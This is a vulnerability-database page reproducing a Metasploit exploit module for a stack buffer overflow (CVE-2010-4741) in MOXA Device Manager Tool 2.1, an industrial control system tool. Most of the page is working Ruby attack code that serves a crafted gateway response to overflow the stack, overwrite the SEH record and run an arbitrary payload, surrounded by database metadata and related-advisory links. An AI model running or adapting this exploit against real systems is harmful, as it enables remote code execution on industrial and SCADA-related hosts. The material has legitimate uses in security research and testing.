Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtMetasploit1337DAY-ID-27389
HistoryMar 23, 2017 - 12:00 a.m.

MOXA Device Manager Tool 2.1 - Buffer Overflow Exploit

2017-03-2300:00:00
metasploit
0day.today
16

0.332 Low

EPSS

Percentile

97.1%

JSON

Exploit for windows platform in category local exploits

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Exploit::Remote
 
  Rank = GreatRanking
 
  include Msf::Exploit::Remote::TcpServer
  include Msf::Exploit::Remote::Seh
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MOXA Device Manager Tool 2.1 Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in MOXA MDM Tool 2.1.
        When sending a specially crafted MDMGw (MDM2_Gateway) response, an
        attacker may be able to execute arbitrary code.
      },
      'Author'         => [ 'Ruben Santamarta', 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2010-4741'],
          [ 'OSVDB', '69027'],
          [ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=70&Itemid=' ],
          [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICSA-10-301-01A.pdf' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
        },
      'Payload'        =>
        {
          'Space'    => 600,
          'BadChars' => "\x00\x0a\x0d\x20",
          'StackAdjustment' => -3500
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'MOXA MDM Tool 2.1', { 'Ret' => 0x1016bca7 } ], # UTU.dll / keeping the rop version for me...
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Oct 20 2010',
      'DefaultTarget'  => 0))
 
    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The daemon port to listen on.", 54321 ])
      ], self.class)
  end
 
  def on_client_connect(client)
 
    return if ((p = regenerate_payload(client)) == nil)
 
    client.get_once
 
    sploit = rand_text_alpha_upper(18024)
 
    sploit[0, 4] = [0x29001028].pack('V')
    sploit[472, payload.encoded.length] = payload.encoded
    sploit[1072, 8] = generate_seh_record(target.ret)
    sploit[1080, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-550").encode_string
 
    client.put(sploit)
 
    handler(client)
 
    service.close_client(client)
 
  end
end

#  0day.today [2018-03-01]  #

Related

cve 1
checkpoint_advisories 1
openvas 2
nvd 1
exploitdb 1
prion 1
cvelist 1
ics 1
cve
cve
CVE-2010-4741
2022-10-03 16:21:05
checkpoint_advisories
checkpoint_advisories
MOXA Device Manager Tool SCADA Buffer Overflow (CVE-2010-4741)
2014-08-10 00:00:00
openvas
openvas
MOXA Device Manager MDM Tool Buffer Overflow Vulnerability
2011-02-28 00:00:00
MOXA Device Manager MDM Tool Buffer Overflow Vulnerability
2011-02-28 00:00:00
nvd
nvd
CVE-2010-4741
2011-02-18 18:00:00
exploitdb
exploitdb
MOXA Device Manager Tool 2.1 - Buffer Overflow (Metasploit)
2010-10-20 00:00:00
prion
prion
Stack overflow
2011-02-18 18:00:00
cvelist
cvelist
CVE-2010-4741
2022-10-03 16:21:05
ics
ics
GLEG Agora SCADA+ Exploit Pack
2018-09-06 12:00:00

0.332 Low

EPSS

Percentile

97.1%

JSON
Related for 1337DAY-ID-27389
cve1checkpoint_advisories1openvas2nvd1exploitdb1prion1cvelist1ics1